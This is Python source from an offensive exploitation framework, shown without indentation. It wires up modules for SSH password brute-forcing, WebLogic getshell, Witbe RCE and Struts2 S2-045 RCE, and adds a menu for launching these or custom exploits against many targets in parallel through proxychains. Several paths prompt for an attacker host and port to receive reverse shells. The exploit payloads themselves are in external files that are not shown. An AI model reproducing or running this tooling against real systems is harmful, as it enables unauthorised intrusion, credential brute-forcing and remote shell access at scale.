def ssh_bruteforcer():
'''
call single thread ssh_bruteforcer
'''
password_list = console.input_check(
"[*] Password list file to use: ", allow_blank=False)
if not os.path.isfile(password_list):
console.print_error("[-] Password list not found")
return []
# command to exec
command = console.input_check("[*] Command to exec: ", allow_blank=False)
# args list
exploit = 'ssh_bruteforce.py'
work_path = '/ssh-bruteforce/'
exec_path = exploit
custom_args = str(password_list + ' ' + command).split()
jobs = 100
print(colors.BLUE +
'[*] Your exploit will be executed like\n' +
colors.END,
'proxychains4 -q -f proxy.conf {} {} -t <target ip>'.format(exec_path,
' '.join(custom_args)))
# start scanner
scanner_args = console.ScannerArgs(work_path, exec_path, custom_args, jobs)
return scanner_args
def weblogic():
'''
with reverse shell
'''
print(colors.BLUE +
'\n[*] Welcome to Weblogic getshell exploit' +
colors.END)
server_port = console.input_check(
"[?] What's the port of Welogic server? ",
check_type=int)
os_type = console.input_check(
'[?] Windows or Linux? [w/l] ', choices=['w', 'l'])
if console.input_check('[?] Do you need a reverse shell? [y/n] ',
choices=['y', 'n']) == 'y':
shell_server = console.input_check(
'[?] What\'s the IP of shell receiver? ',
allow_blank=False, ip_check=True)
port = console.input_check(
'[?] What\'s the port of shell receiver? ',
check_type=int)
if os_type.lower() == 'w':
custom_args = '-l {} -p {} -P {} --silent -T '.format(
shell_server, port, server_port) +\
'reverse_shell -os win'
custom_args = custom_args.split()
elif os_type.lower() == 'l':
custom_args = '-l {} -p {} -P {} --silent -T '.format(
shell_server, port, server_port) +\
'reverse_shell -os linux'
custom_args = custom_args.split()
else:
console.print_error('[-] Invalid input')
return []
else:
cmd = console.input_check(
'[?] What command do you want to execute on the target? ',
allow_blank=False).strip()
if os_type.lower() == 'w':
custom_args = '-P {} --silent -T exploit -c {} -os win'.format(
server_port, cmd).split()
elif os_type.lower() == 'l':
custom_args = '-P {} --silent -T exploit -c {} -os linux'.format(
server_port, cmd).split()
else:
return []
# start scanner
exploit = 'weblogic.py'
work_path = '/weblogic/'
exec_path = exploit
jobs = 100
# waitTime = 25 # deprecated
scanner_args = console.ScannerArgs(work_path, exec_path, custom_args, jobs)
return scanner_args
def witbe():
'''
witbe rce
'''
print(colors.BLUE + '\n[*] Welcome to Witbe RCE' + colors.END)
# shell server config
rhost = console.input_check('[?] IP of your shell server: ')
rport = console.input_check('[?] and Port? ', check_type=int)
# exploit config
exploit = 'witbe.py'
work_path = '/witbe/'
exec_path = exploit
custom_args = str('-l ' + rhost + ' -p ' + rport).split()
jobs = 50
print(colors.BLUE +
'[*] Your exploit will be executed like\n' +
colors.END,
'proxychains4 -q -f proxy.conf {} -t <target ip>'.format(exec_path),
' '.join(custom_args))
# start scanner
scanner_args = console.ScannerArgs(work_path, exec_path, custom_args, jobs)
return scanner_args
def s2_045():
'''
struts2 045 rce
'''
print(colors.BLUE + '\n[*] Welcome to S2-045' + colors.END)
port = console.input_check(
'[?] What\'s the port of your target server? ',
check_type=int)
# args list
exploit = 's2_045_cmd.py'
work_path = '/structs2/'
exec_path = exploit
custom_args = str('-p ' + port).split()
jobs = 100
print(colors.BLUE +
'[*] Your exploit will be executed like\n' +
colors.END,
'proxychains4 -q -f proxy.conf {} {} -t <target ip>'.format(exec_path,
' '.join(custom_args)))
# start scanner
scanner_args = console.ScannerArgs(work_path, exec_path, custom_args, jobs)
return scanner_args
def attack():
'''
handles attack command
'''
SESSION.use_proxy = input_check(
'[?] Do you wish to use proxychains? [y/n] ', choices=['y',
'n']) == 'y'
if SESSION.use_proxy:
if shutil.which("proxychains4") is None:
console.print_error("proxychains4 not found")
return
execute("proxy")
answ = input_check('\n[?] Do you wish to use\
\n\n [a] built-in exploits\
\n [m] or launch your own manually?\
\n\n[=] Your choice: ',
choices=['a', 'm'])
if answ == 'a':
print(colors.CYAN + colors.BOLD + '\n[?] Choose a module from: ' +
colors.END + '\n')
print(console.BUILT_IN)
answ = input_check('[=] Your choice: ',
check_type=int,
choices=['0', '1', '2', '3', '4'])
try:
if answ == '0':
scanner(exploit_exec.ssh_bruteforcer())
elif answ == '1':
scanner(exploit_exec.weblogic())
elif answ == '2':
console.print_error("[-] Not available")
elif answ == '3':
console.print_error("[-] Not available")
elif answ == '4':
scanner(exploit_exec.s2_045())
except (EOFError, KeyboardInterrupt, SystemExit):
return
elif answ == 'm':
print(colors.CYAN + colors.UNDERLINE + colors.BOLD +
"\nWelcome, in here you can choose your own exploit\n" +
colors.END)
colored_print('[*] Here are available exploits:\n', colors.CYAN)
for poc in list_exp():
colored_print(poc + colors.END, colors.BLUE)
exploit = input_check(
"\n[*] Enter the path (eg. joomla/rce.py) of your exploit: ",
choices=list_exp())
jobs = int(
input_check("[?] How many processes each time? ", check_type=int))
custom_args = []
answ = input_check("[?] Do you need a reverse shell [y/n]? ",
choices=['y', 'n'])
if answ == 'y':
lhost = input_check("[*] Where do you want me to send shells? ",
allow_blank=False,
ip_check=True)
lport = input_check("[*] and at what port?", check_type=int)
custom_args = ['-l', lhost, '-p', lport]
else:
pass
custom_args += input_check(
"[*] args for this exploit: ").strip().split()
# parse user's exploit name
exec_path = exploit.split('/')[1:]
work_path = exploit.split('/')[:-1]
exec_path = '/'.join(exec_path)
work_path = '/'.join(work_path)
# let user check if there's anything wrong
print(
colors.BLUE + '[*] Your exploit will be executed like\n' +
colors.END,
'proxychains4 -q -f proxy.conf {} -t <target ip>'.format(
exec_path), ' '.join(custom_args))
# args as parameter for scanner
scanner_args = console.ScannerArgs(work_path, exec_path, custom_args,
jobs)
# start scanner
scanner(scanner_args)
else:
console.print_error('[-] Invalid input')